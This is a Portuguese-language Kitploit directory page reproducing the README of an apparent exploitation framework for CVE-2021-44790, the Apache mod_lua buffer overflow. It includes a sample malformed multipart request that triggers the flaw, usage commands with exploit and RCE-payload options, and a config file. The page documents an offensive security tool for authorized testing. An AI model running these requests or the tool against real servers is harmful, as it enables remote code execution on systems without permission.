Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web Vulnerability ScannersExploit FrameworksExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Ver Repositório
1há 13 diasAinda não revisado

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.

Compartilhar

🔥 CVE-2021-44790 - Exploração de Buffer Overflow no Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Visão Geral

Exploração de Buffer Overflow no Apache mod_lua é uma plataforma de exploração avançada, de nível empresarial, para CVE-2021-44790 — uma vulnerabilidade crítica de buffer overflow no módulo mod_lua do Apache HTTP Server 2.4.x. Este framework oferece fingerprinting abrangente, descoberta inteligente de scripts, varredura em múltiplas etapas e recursos profissionais de geração de relatórios, com mais de 95% de confiança na detecção.

⚡ Principais Recursos


🎯 Detalhes da Vulnerabilidade

Descrição Técnica

A vulnerabilidade existe no módulo mod_lua ao processar requisições multipart/form-data. Um underflow de inteiro na função lua_request_parsebody() pode levar a um buffer overflow baseado em heap, potencialmente permitindo execução remota de código.

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Capturas de Tela

Interface PrincipalResultados do Fingerprint

🚀 Início Rápido

Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Uso Básico

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Uso Detalhado

Opções de Linha de Comando

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]

Exemplos

1. Avaliação Básica de Vulnerabilidade

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. Varredura em Ambiente Corporativo

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Teste de Penetração Completo

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Varredura em Lote

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. Consultas ao Banco de Dados

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configuração

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 Relatórios

Painel HTML

  • Gráficos e tabelas interativos
  • Visualização do fingerprint do alvo
  • Resumo da descoberta de scripts
  • Linha do tempo da execução de payloads
  • Avaliação de vulnerabilidade
  • Pontuação de risco

Relatório JSON

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

Relatório Markdown

  • Documentação legível por humanos
  • Dados formatados em tabelas
  • Fácil compartilhamento e incorporação
  • Compatível com controle de versão

🗄️ Esquema do Banco de Dados

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 Sistema de Plugins

Criando um Plugin

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ Considerações de Segurança

  • Somente Uso Autorizado: Esta ferramenta destina-se a testes de segurança autorizados
  • Conformidade Legal: Certifique-se de ter permissão antes de testar
  • Divulgação Responsável: Reporte vulnerabilidades de forma responsável
  • Proteção de Dados: Todos os dados confidenciais são armazenados localmente

⚠️ Aviso Legal

root@kitploit:~
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.

Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.

By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes

📈 Métricas de Desempenho


🗺️ Roteiro

Versão 2.1 (Planejada)

  • Suporte a CVEs adicionais
  • Interface web
  • Contêinerização Docker
  • Pipeline de CI/CD
  • Mais variantes de payloads

Versão 2.2 (Futura)

  • Integração com aprendizado de máquina
  • Exploração automatizada
  • Varredura baseada em nuvem
  • Recursos de colaboração em equipe
  • Técnicas avançadas de evasão

🤝 Contribuindo

Contribuições são bem-vindas! Siga estas diretrizes:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça suas alterações
  4. Envie um pull request

Configuração de Desenvolvimento

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 Autor

Sudeepa Wanigarathna

  • Pesquisador de Segurança e Hacker Ético
  • GitHub: @CerberusMrXi
  • Foco: Pesquisa de Vulnerabilidades e Desenvolvimento de Exploits

📄 Licença

Somente para Fins Educacionais e de Testes Autorizados

Este software é fornecido "no estado em que se encontra", sem garantia de qualquer tipo, expressa ou implícita.


⭐ Dê uma estrela neste repositório para apoiar o projeto!

💡 Encontrou um bug? Abra uma issue

📧 Contato: [email protected]


Feito com ❤️ para a comunidade de segurança

Baixar ferramenta
RecursoDescrição
🔍 Fingerprinting AvançadoDetecção de versão do Apache, mod_lua, SO, arquitetura, WAF, CDN, contêiner e provedor de nuvem
🎯 Descoberta InteligenteMais de 7 técnicas de descoberta, incluindo robots.txt, sitemap, parsing de HTML e extração de JavaScript
💥 Varredura em Múltiplas EtapasConexão → Fingerprint → Descoberta → Verificação → Exploração → Relatórios
🧩 Sistema de Plugins ExtensívelDesenvolvimento fácil de plugins para CVEs futuras
🌐 Motor HTTP InteligentePool de conexões, novas tentativas, suporte a HTTP/2 e limitação de taxa
📊 Relatórios AbrangentesJSON, HTML, Markdown e PDF com painéis interativos
🎨 Interface de Terminal AtraenteBiblioteca Rich com barras de progresso, tabelas e saída codificada por cores
💾 Banco de Dados de PesquisaArmazenamento SQLite com histórico completo de varreduras e suporte a consultas
📸 Captura de ScreenshotsScreenshots automáticos de páginas web para coleta de evidências
🚀 Alto DesempenhoMais de 20 threads simultâneas e mais de 100 pools de conexões
AtributoValor
ID do CVECVE-2021-44790
VulnerabilidadeBuffer Overflow (Underflow de Inteiro)
Software AfetadoApache HTTP Server 2.4.0 a 2.4.51
Versão CorrigidaApache HTTP Server 2.4.52 e posteriores
ComponenteMódulo mod_lua
Vetor de AtaqueRede (Remoto)
Pontuação CVSS9.8 (Crítica)
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
Maturidade do ExploitProva de Conceito Disponível
Progresso da VarreduraPainel do Relatório HTML
OpçãoDescriçãoExemplo
TARGETURL do alvohttp://target.com
--config FILEArquivo de configuração--config config.yaml
--threads NNúmero de threads--threads 30
--timeout NTempo limite da requisição (segundos)--timeout 15
--proxy URLURL do proxy--proxy http://127.0.0.1:8080
--verboseSaída detalhada--verbose
--scan-onlyVarredura sem exploração--scan-only
--exploitHabilitar exploração--exploit
--all-payloadsUsar todos os payloads--all-payloads
--report FORMATFormato do relatório (json/html/markdown/all)--report all
--output DIRDiretório de saída--output /path/to/reports/
--researchHabilitar modo de pesquisa--research
--database FILECaminho do banco de dados--database luastorm.db
--screenshotCapturar screenshots--screenshot
--batch FILEArquivo em lote com alvos--batch targets.txt
--query SQLExecutar consulta no banco de dados--query "SELECT * FROM targets"
RecursoDesempenho
Fingerprinting< 2 segundos
Descoberta de Scripts5 a 10 segundos
Teste de Payloads1 a 5 segundos por payload
Geração de Relatórios< 1 segundo
Operações de Banco de Dados< 100ms
Threads Simultâneas20+
Pool de Conexões100+